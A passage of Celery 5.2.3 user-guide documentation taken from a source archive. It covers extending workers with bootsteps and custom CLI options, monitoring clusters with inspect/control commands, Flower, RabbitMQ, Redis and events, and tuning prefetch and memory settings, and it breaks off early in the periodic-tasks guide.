:class:`celery.concurrency.base.BasePool`. .. _extending-consumer-timer: .. attribute:: timer :class:`Timer >> app = Celery() >>> app.steps['worker'].add(MyWorkerStep) # < add class, don't instantiate >>> app.steps['consumer'].add(MyConsumerStep) >>> app.steps['consumer'].update([StepA, StepB]) >>> app.steps['consumer'] {step:proj.StepB{()}, step:proj.MyConsumerStep{()}, step:proj.StepA{()} The order of steps isn't important here as the order is decided by the resulting dependency graph (``Step.requires``). To illustrate how you can install bootsteps and how they work, this is an example step that prints some useless debugging information. It can be added both as a worker and consumer bootstep: .. code-block:: python from celery import Celery from celery import bootsteps class InfoStep(bootsteps.Step): def __init__(self, parent, **kwargs): # here we can prepare the Worker/Consumer object # in any way we want, set attribute defaults, and so on. print('{0!r} is in init'.format(parent)) def start(self, parent): # our step is started together with all other Worker/Consumer # bootsteps. print('{0!r} is starting'.format(parent)) def stop(self, parent): # the Consumer calls stop every time the consumer is # restarted (i.e., connection is lost) and also at shutdown. # The Worker will call stop at shutdown only. print('{0!r} is stopping'.format(parent)) def shutdown(self, parent): # shutdown is called by the Consumer at shutdown, it's not # called by Worker. print('{0!r} is shutting down'.format(parent)) app = Celery(broker='amqp://') app.steps['worker'].add(InfoStep) app.steps['consumer'].add(InfoStep) Starting the worker with this step installed will give us the following logs: .. code-block:: text is in init is in init [2013-05-29 16:18:20,544: WARNING/MainProcess] is starting [2013-05-29 16:18:21,577: WARNING/MainProcess] is starting is stopping is stopping is shutting down The ``print`` statements will be redirected to the logging subsystem after the worker has been initialized, so the "is starting" lines are time-stamped. You may notice that this does no longer happen at shutdown, this is because the ``stop`` and ``shutdown`` methods are called inside a *signal handler*, and it's not safe to use logging inside such a handler. Logging with the Python logging module isn't :term:`reentrant`: meaning you cannot interrupt the function then call it again later. It's important that the ``stop`` and ``shutdown`` methods you write is also :term:`reentrant`. Starting the worker with :option:`--loglevel=debug ` will show us more information about the boot process: .. code-block:: text [2013-05-29 16:18:20,509: DEBUG/MainProcess] | Worker: Preparing bootsteps. [2013-05-29 16:18:20,511: DEBUG/MainProcess] | Worker: Building graph... is in init [2013-05-29 16:18:20,511: DEBUG/MainProcess] | Worker: New boot order: {Hub, Pool, Timer, StateDB, Autoscaler, InfoStep, Beat, Consumer} [2013-05-29 16:18:20,514: DEBUG/MainProcess] | Consumer: Preparing bootsteps. [2013-05-29 16:18:20,514: DEBUG/MainProcess] | Consumer: Building graph... is in init [2013-05-29 16:18:20,515: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Mingle, Events, Gossip, InfoStep, Agent, Heart, Control, Tasks, event loop} [2013-05-29 16:18:20,522: DEBUG/MainProcess] | Worker: Starting Hub [2013-05-29 16:18:20,522: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,522: DEBUG/MainProcess] | Worker: Starting Pool [2013-05-29 16:18:20,542: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,543: DEBUG/MainProcess] | Worker: Starting InfoStep [2013-05-29 16:18:20,544: WARNING/MainProcess] is starting [2013-05-29 16:18:20,544: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,544: DEBUG/MainProcess] | Worker: Starting Consumer [2013-05-29 16:18:20,544: DEBUG/MainProcess] | Consumer: Starting Connection [2013-05-29 16:18:20,559: INFO/MainProcess] Connected to amqp://guest@127.0.0.1:5672// [2013-05-29 16:18:20,560: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:20,560: DEBUG/MainProcess] | Consumer: Starting Mingle [2013-05-29 16:18:20,560: INFO/MainProcess] mingle: searching for neighbors [2013-05-29 16:18:21,570: INFO/MainProcess] mingle: no one here [2013-05-29 16:18:21,570: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,571: DEBUG/MainProcess] | Consumer: Starting Events [2013-05-29 16:18:21,572: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,572: DEBUG/MainProcess] | Consumer: Starting Gossip [2013-05-29 16:18:21,577: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,577: DEBUG/MainProcess] | Consumer: Starting InfoStep [2013-05-29 16:18:21,577: WARNING/MainProcess] is starting [2013-05-29 16:18:21,578: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,578: DEBUG/MainProcess] | Consumer: Starting Heart [2013-05-29 16:18:21,579: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,579: DEBUG/MainProcess] | Consumer: Starting Control [2013-05-29 16:18:21,583: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,583: DEBUG/MainProcess] | Consumer: Starting Tasks [2013-05-29 16:18:21,606: DEBUG/MainProcess] basic.qos: prefetch_count->80 [2013-05-29 16:18:21,606: DEBUG/MainProcess] ^-- substep ok [2013-05-29 16:18:21,606: DEBUG/MainProcess] | Consumer: Starting event loop [2013-05-29 16:18:21,608: WARNING/MainProcess] celery@example.com ready. .. _extending-programs: Command-line programs ===================== .. _extending-commandoptions: Adding new command-line options ------------------------------- .. _extending-command-options: Command-specific options ~~~~~~~~~~~~~~~~~~~~~~~~ You can add additional command-line options to the ``worker``, ``beat``, and ``events`` commands by modifying the :attr:`~@user_options` attribute of the application instance. Celery commands uses the :mod:`click` module to parse command-line arguments, and so to add custom arguments you need to add :class:`click.Option` instances to the relevant set. Example adding a custom option to the :program:`celery worker` command: .. code-block:: python from celery import Celery from click import Option app = Celery(broker='amqp://') app.user_options['worker'].add(Option(('--enable-my-option',), is_flag=True, help='Enable custom option.')) All bootsteps will now receive this argument as a keyword argument to ``Bootstep.__init__``: .. code-block:: python from celery import bootsteps class MyBootstep(bootsteps.Step): def __init__(self, parent, enable_my_option=False, **options): super().__init__(parent, **options) if enable_my_option: party() app.steps['worker'].add(MyBootstep) .. _extending-preload_options: Preload options ~~~~~~~~~~~~~~~ The :program:`celery` umbrella command supports the concept of 'preload options'. These are special options passed to all sub-commands. You can add new preload options, for example to specify a configuration template: .. code-block:: python from celery import Celery from celery import signals from click import Option app = Celery() app.user_options['preload'].add(Option(('-Z', '--template'), default='default', help='Configuration template to use.')) @signals.user_preload_options.connect def on_preload_parsed(options, **kwargs): use_template(options['template']) .. _extending-subcommands: Adding new :program:`celery` sub-commands ----------------------------------------- New commands can be added to the :program:`celery` umbrella command by using `setuptools entry-points`_. .. _`setuptools entry-points`: http://reinout.vanrees.org/weblog/2010/01/06/zest-releaser-entry-points.html Entry-points is special meta-data that can be added to your packages ``setup.py`` program, and then after installation, read from the system using the :mod:`pkg_resources` module. Celery recognizes ``celery.commands`` entry-points to install additional sub-commands, where the value of the entry-point must point to a valid click command. This is how the :pypi:`Flower` monitoring extension may add the :program:`celery flower` command, by adding an entry-point in :file:`setup.py`: .. code-block:: python setup( name='flower', entry_points={ 'celery.commands': [ 'flower = flower.command:flower', ], } ) The command definition is in two parts separated by the equal sign, where the first part is the name of the sub-command (flower), then the second part is the fully qualified symbol path to the function that implements the command: .. code-block:: text flower.command:flower The module path and the name of the attribute should be separated by colon as above. In the module :file:`flower/command.py`, the command function may be defined as the following: .. code-block:: python import click @click.command() @click.option('--port', default=8888, type=int, help='Webserver port') @click.option('--debug', is_flag=True) def flower(port, debug): print('Running our command') Worker API ========== :class:`~kombu.asynchronous.Hub` - The workers async event loop --------------------------------------------------------------- :supported transports: amqp, redis .. versionadded:: 3.0 The worker uses asynchronous I/O when the amqp or redis broker transports are used. The eventual goal is for all transports to use the event-loop, but that will take some time so other transports still use a threading-based solution. .. method:: hub.add(fd, callback, flags) .. method:: hub.add_reader(fd, callback, \*args) Add callback to be called when ``fd`` is readable. The callback will stay registered until explicitly removed using :meth:`hub.remove(fd) `, or the file descriptor is automatically discarded because it's no longer valid. Note that only one callback can be registered for any given file descriptor at a time, so calling ``add`` a second time will remove any callback that was previously registered for that file descriptor. A file descriptor is any file-like object that supports the ``fileno`` method, or it can be the file descriptor number (int). .. method:: hub.add_writer(fd, callback, \*args) Add callback to be called when ``fd`` is writable. See also notes for :meth:`hub.add_reader` above. .. method:: hub.remove(fd) Remove all callbacks for file descriptor ``fd`` from the loop. Timer - Scheduling events ------------------------- .. method:: timer.call_after(secs, callback, args=(), kwargs=(), priority=0) .. method:: timer.call_repeatedly(secs, callback, args=(), kwargs=(), priority=0) .. method:: timer.call_at(eta, callback, args=(), kwargs=(), priority=0) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/index.rst0000664000175000017500000000056400000000000017467 0ustar00asifasif00000000000000.. _guide: ============ User Guide ============ :Release: |version| :Date: |today| .. toctree:: :maxdepth: 1 application tasks calling canvas workers daemonizing periodic-tasks routing monitoring security optimizing debugging concurrency/index signals testing extending configuration sphinx ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/monitoring.rst0000664000175000017500000005250300000000000020545 0ustar00asifasif00000000000000.. _guide-monitoring: ================================= Monitoring and Management Guide ================================= .. contents:: :local: Introduction ============ There are several tools available to monitor and inspect Celery clusters. This document describes some of these, as well as features related to monitoring, like events and broadcast commands. .. _monitoring-workers: Workers ======= .. _monitoring-control: Management Command-line Utilities (``inspect``/``control``) ----------------------------------------------------------- :program:`celery` can also be used to inspect and manage worker nodes (and to some degree tasks). To list all the commands available do: .. code-block:: console $ celery --help or to get help for a specific command do: .. code-block:: console $ celery --help Commands ~~~~~~~~ * **shell**: Drop into a Python shell. The locals will include the ``celery`` variable: this is the current app. Also all known tasks will be automatically added to locals (unless the :option:`--without-tasks ` flag is set). Uses :pypi:`Ipython`, :pypi:`bpython`, or regular :program:`python` in that order if installed. You can force an implementation using :option:`--ipython `, :option:`--bpython `, or :option:`--python `. * **status**: List active nodes in this cluster .. code-block:: console $ celery -A proj status * **result**: Show the result of a task .. code-block:: console $ celery -A proj result -t tasks.add 4e196aa4-0141-4601-8138-7aa33db0f577 Note that you can omit the name of the task as long as the task doesn't use a custom result backend. * **purge**: Purge messages from all configured task queues. This command will remove all messages from queues configured in the :setting:`CELERY_QUEUES` setting: .. warning:: There's no undo for this operation, and messages will be permanently deleted! .. code-block:: console $ celery -A proj purge You can also specify the queues to purge using the `-Q` option: .. code-block:: console $ celery -A proj purge -Q celery,foo,bar and exclude queues from being purged using the `-X` option: .. code-block:: console $ celery -A proj purge -X celery * **inspect active**: List active tasks .. code-block:: console $ celery -A proj inspect active These are all the tasks that are currently being executed. * **inspect scheduled**: List scheduled ETA tasks .. code-block:: console $ celery -A proj inspect scheduled These are tasks reserved by the worker when they have an `eta` or `countdown` argument set. * **inspect reserved**: List reserved tasks .. code-block:: console $ celery -A proj inspect reserved This will list all tasks that have been prefetched by the worker, and is currently waiting to be executed (doesn't include tasks with an ETA value set). * **inspect revoked**: List history of revoked tasks .. code-block:: console $ celery -A proj inspect revoked * **inspect registered**: List registered tasks .. code-block:: console $ celery -A proj inspect registered * **inspect stats**: Show worker statistics (see :ref:`worker-statistics`) .. code-block:: console $ celery -A proj inspect stats * **inspect query_task**: Show information about task(s) by id. Any worker having a task in this set of ids reserved/active will respond with status and information. .. code-block:: console $ celery -A proj inspect query_task e9f6c8f0-fec9-4ae8-a8c6-cf8c8451d4f8 You can also query for information about multiple tasks: .. code-block:: console $ celery -A proj inspect query_task id1 id2 ... idN * **control enable_events**: Enable events .. code-block:: console $ celery -A proj control enable_events * **control disable_events**: Disable events .. code-block:: console $ celery -A proj control disable_events * **migrate**: Migrate tasks from one broker to another (**EXPERIMENTAL**). .. code-block:: console $ celery -A proj migrate redis://localhost amqp://localhost This command will migrate all the tasks on one broker to another. As this command is new and experimental you should be sure to have a backup of the data before proceeding. .. note:: All ``inspect`` and ``control`` commands supports a :option:`--timeout ` argument, This is the number of seconds to wait for responses. You may have to increase this timeout if you're not getting a response due to latency. .. _inspect-destination: Specifying destination nodes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By default the inspect and control commands operates on all workers. You can specify a single, or a list of workers by using the :option:`--destination ` argument: .. code-block:: console $ celery -A proj inspect -d w1@e.com,w2@e.com reserved $ celery -A proj control -d w1@e.com,w2@e.com enable_events .. _monitoring-flower: Flower: Real-time Celery web-monitor ------------------------------------ Flower is a real-time web based monitor and administration tool for Celery. It's under active development, but is already an essential tool. Being the recommended monitor for Celery, it obsoletes the Django-Admin monitor, ``celerymon`` and the ``ncurses`` based monitor. Flower is pronounced like "flow", but you can also use the botanical version if you prefer. Features ~~~~~~~~ - Real-time monitoring using Celery Events - Task progress and history - Ability to show task details (arguments, start time, run-time, and more) - Graphs and statistics - Remote Control - View worker status and statistics - Shutdown and restart worker instances - Control worker pool size and autoscale settings - View and modify the queues a worker instance consumes from - View currently running tasks - View scheduled tasks (ETA/countdown) - View reserved and revoked tasks - Apply time and rate limits - Configuration viewer - Revoke or terminate tasks - HTTP API - List workers - Shut down a worker - Restart worker’s pool - Grow worker’s pool - Shrink worker’s pool - Autoscale worker pool - Start consuming from a queue - Stop consuming from a queue - List tasks - List (seen) task types - Get a task info - Execute a task - Execute a task by name - Get a task result - Change soft and hard time limits for a task - Change rate limit for a task - Revoke a task - OpenID authentication **Screenshots** .. figure:: ../images/dashboard.png :width: 700px .. figure:: ../images/monitor.png :width: 700px More screenshots_: .. _screenshots: https://github.com/mher/flower/tree/master/docs/screenshots Usage ~~~~~ You can use pip to install Flower: .. code-block:: console $ pip install flower Running the flower command will start a web-server that you can visit: .. code-block:: console $ celery -A proj flower The default port is http://localhost:5555, but you can change this using the `--port`_ argument: .. _--port: https://flower.readthedocs.io/en/latest/config.html#port .. code-block:: console $ celery -A proj flower --port=5555 Broker URL can also be passed through the :option:`--broker ` argument : .. code-block:: console $ celery flower --broker=amqp://guest:guest@localhost:5672// or $ celery flower --broker=redis://guest:guest@localhost:6379/0 Then, you can visit flower in your web browser : .. code-block:: console $ open http://localhost:5555 Flower has many more features than are detailed here, including authorization options. Check out the `official documentation`_ for more information. .. _official documentation: https://flower.readthedocs.io/en/latest/ .. _monitoring-celeryev: celery events: Curses Monitor ----------------------------- .. versionadded:: 2.0 `celery events` is a simple curses monitor displaying task and worker history. You can inspect the result and traceback of tasks, and it also supports some management commands like rate limiting and shutting down workers. This monitor was started as a proof of concept, and you probably want to use Flower instead. Starting: .. code-block:: console $ celery -A proj events You should see a screen like: .. figure:: ../images/celeryevshotsm.jpg `celery events` is also used to start snapshot cameras (see :ref:`monitoring-snapshots`: .. code-block:: console $ celery -A proj events --camera= --frequency=1.0 and it includes a tool to dump events to :file:`stdout`: .. code-block:: console $ celery -A proj events --dump For a complete list of options use :option:`--help `: .. code-block:: console $ celery events --help .. _`celerymon`: https://github.com/celery/celerymon/ .. _monitoring-rabbitmq: RabbitMQ ======== To manage a Celery cluster it is important to know how RabbitMQ can be monitored. RabbitMQ ships with the `rabbitmqctl(1)`_ command, with this you can list queues, exchanges, bindings, queue lengths, the memory usage of each queue, as well as manage users, virtual hosts and their permissions. .. note:: The default virtual host (``"/"``) is used in these examples, if you use a custom virtual host you have to add the ``-p`` argument to the command, for example: ``rabbitmqctl list_queues -p my_vhost …`` .. _`rabbitmqctl(1)`: http://www.rabbitmq.com/man/rabbitmqctl.1.man.html .. _monitoring-rmq-queues: Inspecting queues ----------------- Finding the number of tasks in a queue: .. code-block:: console $ rabbitmqctl list_queues name messages messages_ready \ messages_unacknowledged Here `messages_ready` is the number of messages ready for delivery (sent but not received), `messages_unacknowledged` is the number of messages that's been received by a worker but not acknowledged yet (meaning it is in progress, or has been reserved). `messages` is the sum of ready and unacknowledged messages. Finding the number of workers currently consuming from a queue: .. code-block:: console $ rabbitmqctl list_queues name consumers Finding the amount of memory allocated to a queue: .. code-block:: console $ rabbitmqctl list_queues name memory :Tip: Adding the ``-q`` option to `rabbitmqctl(1)`_ makes the output easier to parse. .. _monitoring-redis: Redis ===== If you're using Redis as the broker, you can monitor the Celery cluster using the `redis-cli(1)` command to list lengths of queues. .. _monitoring-redis-queues: Inspecting queues ----------------- Finding the number of tasks in a queue: .. code-block:: console $ redis-cli -h HOST -p PORT -n DATABASE_NUMBER llen QUEUE_NAME The default queue is named `celery`. To get all available queues, invoke: .. code-block:: console $ redis-cli -h HOST -p PORT -n DATABASE_NUMBER keys \* .. note:: Queue keys only exists when there are tasks in them, so if a key doesn't exist it simply means there are no messages in that queue. This is because in Redis a list with no elements in it is automatically removed, and hence it won't show up in the `keys` command output, and `llen` for that list returns 0. Also, if you're using Redis for other purposes, the output of the `keys` command will include unrelated values stored in the database. The recommended way around this is to use a dedicated `DATABASE_NUMBER` for Celery, you can also use database numbers to separate Celery applications from each other (virtual hosts), but this won't affect the monitoring events used by for example Flower as Redis pub/sub commands are global rather than database based. .. _monitoring-munin: Munin ===== This is a list of known Munin plug-ins that can be useful when maintaining a Celery cluster. * ``rabbitmq-munin``: Munin plug-ins for RabbitMQ. https://github.com/ask/rabbitmq-munin * ``celery_tasks``: Monitors the number of times each task type has been executed (requires `celerymon`). https://github.com/munin-monitoring/contrib/blob/master/plugins/celery/celery_tasks * ``celery_tasks_states``: Monitors the number of tasks in each state (requires `celerymon`). https://github.com/munin-monitoring/contrib/blob/master/plugins/celery/celery_tasks_states .. _monitoring-events: Events ====== The worker has the ability to send a message whenever some event happens. These events are then captured by tools like Flower, and :program:`celery events` to monitor the cluster. .. _monitoring-snapshots: Snapshots --------- .. versionadded:: 2.1 Even a single worker can produce a huge amount of events, so storing the history of all events on disk may be very expensive. A sequence of events describes the cluster state in that time period, by taking periodic snapshots of this state you can keep all history, but still only periodically write it to disk. To take snapshots you need a Camera class, with this you can define what should happen every time the state is captured; You can write it to a database, send it by email or something else entirely. :program:`celery events` is then used to take snapshots with the camera, for example if you want to capture state every 2 seconds using the camera ``myapp.Camera`` you run :program:`celery events` with the following arguments: .. code-block:: console $ celery -A proj events -c myapp.Camera --frequency=2.0 .. _monitoring-camera: Custom Camera ~~~~~~~~~~~~~ Cameras can be useful if you need to capture events and do something with those events at an interval. For real-time event processing you should use :class:`@events.Receiver` directly, like in :ref:`event-real-time-example`. Here is an example camera, dumping the snapshot to screen: .. code-block:: python from pprint import pformat from celery.events.snapshot import Polaroid class DumpCam(Polaroid): clear_after = True # clear after flush (incl, state.event_count). def on_shutter(self, state): if not state.event_count: # No new events since last snapshot. return print('Workers: {0}'.format(pformat(state.workers, indent=4))) print('Tasks: {0}'.format(pformat(state.tasks, indent=4))) print('Total: {0.event_count} events, {0.task_count} tasks'.format( state)) See the API reference for :mod:`celery.events.state` to read more about state objects. Now you can use this cam with :program:`celery events` by specifying it with the :option:`-c ` option: .. code-block:: console $ celery -A proj events -c myapp.DumpCam --frequency=2.0 Or you can use it programmatically like this: .. code-block:: python from celery import Celery from myapp import DumpCam def main(app, freq=1.0): state = app.events.State() with app.connection() as connection: recv = app.events.Receiver(connection, handlers={'*': state.event}) with DumpCam(state, freq=freq): recv.capture(limit=None, timeout=None) if __name__ == '__main__': app = Celery(broker='amqp://guest@localhost//') main(app) .. _event-real-time-example: Real-time processing -------------------- To process events in real-time you need the following - An event consumer (this is the ``Receiver``) - A set of handlers called when events come in. You can have different handlers for each event type, or a catch-all handler can be used ('*') - State (optional) :class:`@events.State` is a convenient in-memory representation of tasks and workers in the cluster that's updated as events come in. It encapsulates solutions for many common things, like checking if a worker is still alive (by verifying heartbeats), merging event fields together as events come in, making sure time-stamps are in sync, and so on. Combining these you can easily process events in real-time: .. code-block:: python from celery import Celery def my_monitor(app): state = app.events.State() def announce_failed_tasks(event): state.event(event) # task name is sent only with -received event, and state # will keep track of this for us. task = state.tasks.get(event['uuid']) print('TASK FAILED: %s[%s] %s' % ( task.name, task.uuid, task.info(),)) with app.connection() as connection: recv = app.events.Receiver(connection, handlers={ 'task-failed': announce_failed_tasks, '*': state.event, }) recv.capture(limit=None, timeout=None, wakeup=True) if __name__ == '__main__': app = Celery(broker='amqp://guest@localhost//') my_monitor(app) .. note:: The ``wakeup`` argument to ``capture`` sends a signal to all workers to force them to send a heartbeat. This way you can immediately see workers when the monitor starts. You can listen to specific events by specifying the handlers: .. code-block:: python from celery import Celery def my_monitor(app): state = app.events.State() def announce_failed_tasks(event): state.event(event) # task name is sent only with -received event, and state # will keep track of this for us. task = state.tasks.get(event['uuid']) print('TASK FAILED: %s[%s] %s' % ( task.name, task.uuid, task.info(),)) with app.connection() as connection: recv = app.events.Receiver(connection, handlers={ 'task-failed': announce_failed_tasks, }) recv.capture(limit=None, timeout=None, wakeup=True) if __name__ == '__main__': app = Celery(broker='amqp://guest@localhost//') my_monitor(app) .. _event-reference: Event Reference =============== This list contains the events sent by the worker, and their arguments. .. _event-reference-task: Task Events ----------- .. event:: task-sent task-sent ~~~~~~~~~ :signature: ``task-sent(uuid, name, args, kwargs, retries, eta, expires, queue, exchange, routing_key, root_id, parent_id)`` Sent when a task message is published and the :setting:`task_send_sent_event` setting is enabled. .. event:: task-received task-received ~~~~~~~~~~~~~ :signature: ``task-received(uuid, name, args, kwargs, retries, eta, hostname, timestamp, root_id, parent_id)`` Sent when the worker receives a task. .. event:: task-started task-started ~~~~~~~~~~~~ :signature: ``task-started(uuid, hostname, timestamp, pid)`` Sent just before the worker executes the task. .. event:: task-succeeded task-succeeded ~~~~~~~~~~~~~~ :signature: ``task-succeeded(uuid, result, runtime, hostname, timestamp)`` Sent if the task executed successfully. Run-time is the time it took to execute the task using the pool. (Starting from the task is sent to the worker pool, and ending when the pool result handler callback is called). .. event:: task-failed task-failed ~~~~~~~~~~~ :signature: ``task-failed(uuid, exception, traceback, hostname, timestamp)`` Sent if the execution of the task failed. .. event:: task-rejected task-rejected ~~~~~~~~~~~~~ :signature: ``task-rejected(uuid, requeued)`` The task was rejected by the worker, possibly to be re-queued or moved to a dead letter queue. .. event:: task-revoked task-revoked ~~~~~~~~~~~~ :signature: ``task-revoked(uuid, terminated, signum, expired)`` Sent if the task has been revoked (Note that this is likely to be sent by more than one worker). - ``terminated`` is set to true if the task process was terminated, and the ``signum`` field set to the signal used. - ``expired`` is set to true if the task expired. .. event:: task-retried task-retried ~~~~~~~~~~~~ :signature: ``task-retried(uuid, exception, traceback, hostname, timestamp)`` Sent if the task failed, but will be retried in the future. .. _event-reference-worker: Worker Events ------------- .. event:: worker-online worker-online ~~~~~~~~~~~~~ :signature: ``worker-online(hostname, timestamp, freq, sw_ident, sw_ver, sw_sys)`` The worker has connected to the broker and is online. - `hostname`: Nodename of the worker. - `timestamp`: Event time-stamp. - `freq`: Heartbeat frequency in seconds (float). - `sw_ident`: Name of worker software (e.g., ``py-celery``). - `sw_ver`: Software version (e.g., 2.2.0). - `sw_sys`: Operating System (e.g., Linux/Darwin). .. event:: worker-heartbeat worker-heartbeat ~~~~~~~~~~~~~~~~ :signature: ``worker-heartbeat(hostname, timestamp, freq, sw_ident, sw_ver, sw_sys, active, processed)`` Sent every minute, if the worker hasn't sent a heartbeat in 2 minutes, it is considered to be offline. - `hostname`: Nodename of the worker. - `timestamp`: Event time-stamp. - `freq`: Heartbeat frequency in seconds (float). - `sw_ident`: Name of worker software (e.g., ``py-celery``). - `sw_ver`: Software version (e.g., 2.2.0). - `sw_sys`: Operating System (e.g., Linux/Darwin). - `active`: Number of currently executing tasks. - `processed`: Total number of tasks processed by this worker. .. event:: worker-offline worker-offline ~~~~~~~~~~~~~~ :signature: ``worker-offline(hostname, timestamp, freq, sw_ident, sw_ver, sw_sys)`` The worker has disconnected from the broker. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/userguide/optimizing.rst0000664000175000017500000002036500000000000020552 0ustar00asifasif00000000000000.. _guide-optimizing: ============ Optimizing ============ Introduction ============ The default configuration makes a lot of compromises. It's not optimal for any single case, but works well enough for most situations. There are optimizations that can be applied based on specific use cases. Optimizations can apply to different properties of the running environment, be it the time tasks take to execute, the amount of memory used, or responsiveness at times of high load. Ensuring Operations =================== In the book `Programming Pearls`_, Jon Bentley presents the concept of back-of-the-envelope calculations by asking the question; ❝ How much water flows out of the Mississippi River in a day? ❞ The point of this exercise [*]_ is to show that there's a limit to how much data a system can process in a timely manner. Back of the envelope calculations can be used as a means to plan for this ahead of time. In Celery; If a task takes 10 minutes to complete, and there are 10 new tasks coming in every minute, the queue will never be empty. This is why it's very important that you monitor queue lengths! A way to do this is by :ref:`using Munin `. You should set up alerts, that'll notify you as soon as any queue has reached an unacceptable size. This way you can take appropriate action like adding new worker nodes, or revoking unnecessary tasks. .. _`Programming Pearls`: http://www.cs.bell-labs.com/cm/cs/pearls/ .. _`The back of the envelope`: http://books.google.com/books?id=kse_7qbWbjsC&pg=PA67 .. _optimizing-general-settings: General Settings ================ .. _optimizing-connection-pools: Broker Connection Pools ----------------------- The broker connection pool is enabled by default since version 2.5. You can tweak the :setting:`broker_pool_limit` setting to minimize contention, and the value should be based on the number of active threads/green-threads using broker connections. .. _optimizing-transient-queues: Using Transient Queues ---------------------- Queues created by Celery are persistent by default. This means that the broker will write messages to disk to ensure that the tasks will be executed even if the broker is restarted. But in some cases it's fine that the message is lost, so not all tasks require durability. You can create a *transient* queue for these tasks to improve performance: .. code-block:: python from kombu import Exchange, Queue task_queues = ( Queue('celery', routing_key='celery'), Queue('transient', Exchange('transient', delivery_mode=1), routing_key='transient', durable=False), ) or by using :setting:`task_routes`: .. code-block:: python task_routes = { 'proj.tasks.add': {'queue': 'celery', 'delivery_mode': 'transient'} } The ``delivery_mode`` changes how the messages to this queue are delivered. A value of one means that the message won't be written to disk, and a value of two (default) means that the message can be written to disk. To direct a task to your new transient queue you can specify the queue argument (or use the :setting:`task_routes` setting): .. code-block:: python task.apply_async(args, queue='transient') For more information see the :ref:`routing guide `. .. _optimizing-worker-settings: Worker Settings =============== .. _optimizing-prefetch-limit: Prefetch Limits --------------- *Prefetch* is a term inherited from AMQP that's often misunderstood by users. The prefetch limit is a **limit** for the number of tasks (messages) a worker can reserve for itself. If it is zero, the worker will keep consuming messages, not respecting that there may be other available worker nodes that may be able to process them sooner [*]_, or that the messages may not even fit in memory. The workers' default prefetch count is the :setting:`worker_prefetch_multiplier` setting multiplied by the number of concurrency slots [*]_ (processes/threads/green-threads). If you have many tasks with a long duration you want the multiplier value to be *one*: meaning it'll only reserve one task per worker process at a time. However -- If you have many short-running tasks, and throughput/round trip latency is important to you, this number should be large. The worker is able to process more tasks per second if the messages have already been prefetched, and is available in memory. You may have to experiment to find the best value that works for you. Values like 50 or 150 might make sense in these circumstances. Say 64, or 128. If you have a combination of long- and short-running tasks, the best option is to use two worker nodes that are configured separately, and route the tasks according to the run-time (see :ref:`guide-routing`). Reserve one task at a time -------------------------- The task message is only deleted from the queue after the task is :term:`acknowledged`, so if the worker crashes before acknowledging the task, it can be redelivered to another worker (or the same after recovery). When using the default of early acknowledgment, having a prefetch multiplier setting of *one*, means the worker will reserve at most one extra task for every worker process: or in other words, if the worker is started with :option:`-c 10 `, the worker may reserve at most 20 tasks (10 acknowledged tasks executing, and 10 unacknowledged reserved tasks) at any time. Often users ask if disabling "prefetching of tasks" is possible, but what they really mean by that, is to have a worker only reserve as many tasks as there are worker processes (10 unacknowledged tasks for :option:`-c 10 `) That's possible, but not without also enabling :term:`late acknowledgment`. Using this option over the default behavior means a task that's already started executing will be retried in the event of a power failure or the worker instance being killed abruptly, so this also means the task must be :term:`idempotent` .. seealso:: Notes at :ref:`faq-acks_late-vs-retry`. You can enable this behavior by using the following configuration options: .. code-block:: python task_acks_late = True worker_prefetch_multiplier = 1 Memory Usage ------------ If you are experiencing high memory usage on a prefork worker, first you need to determine whether the issue is also happening on the Celery master process. The Celery master process's memory usage should not continue to increase drastically after start-up. If you see this happening, it may indicate a memory leak bug which should be reported to the Celery issue tracker. If only your child processes have high memory usage, this indicates an issue with your task. Keep in mind, Python process memory usage has a "high watermark" and will not return memory to the operating system until the child process has stopped. This means a single high memory usage task could permanently increase the memory usage of a child process until it's restarted. Fixing this may require adding chunking logic to your task to reduce peak memory usage. Celery workers have two main ways to help reduce memory usage due to the "high watermark" and/or memory leaks in child processes: the :setting:`worker_max_tasks_per_child` and :setting:`worker_max_memory_per_child` settings. You must be careful not to set these settings too low, or else your workers will spend most of their time restarting child processes instead of processing tasks. For example, if you use a :setting:`worker_max_tasks_per_child` of 1 and your child process takes 1 second to start, then that child process would only be able to process a maximum of 60 tasks per minute (assuming the task ran instantly). A similar issue can occur when your tasks always exceed :setting:`worker_max_memory_per_child`. .. rubric:: Footnotes .. [*] The chapter is available to read for free here: `The back of the envelope`_. The book is a classic text. Highly recommended. .. [*] RabbitMQ and other brokers deliver messages round-robin, so this doesn't apply to an active system. If there's no prefetch limit and you restart the cluster, there will be timing delays between nodes starting. If there are 3 offline nodes and one active node, all messages will be delivered to the active node. .. [*] This is the concurrency setting; :setting:`worker_concurrency` or the :option:`celery worker -c` option. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/periodic-tasks.rst0000664000175000017500000004777300000000000021316 0ustar00asifasif00000000000000.. _guide-beat: ================ Periodic Tasks ================ .. contents:: :local: Introduction ============ :program:`celery beat` is a scheduler; It kicks off tasks at regular intervals, that are then executed by available worker nodes in the cluster. By default the entries are taken from the :setting:`beat_schedule` setting, but custom stores can also be used, like storing the entries in a SQL database. You have to ensure only a single scheduler is running for a schedule at a time, otherwise you'd end up with duplicate tasks. Using a centralized approach means the schedule doesn't have to be synchronized, and the service can operate without using locks. .. _beat-timezones: Time Zones ========== The periodic task schedules uses the UTC time zone by default, but you can change the time zone used using the :setting:`timezone` setting. An example time zone could be `Europe/London`: .. code-block:: python timezone = 'Europe/London' This setting must be added to your app, either by configuring it directly using (``app.conf.timezone = 'Europe/London'``), 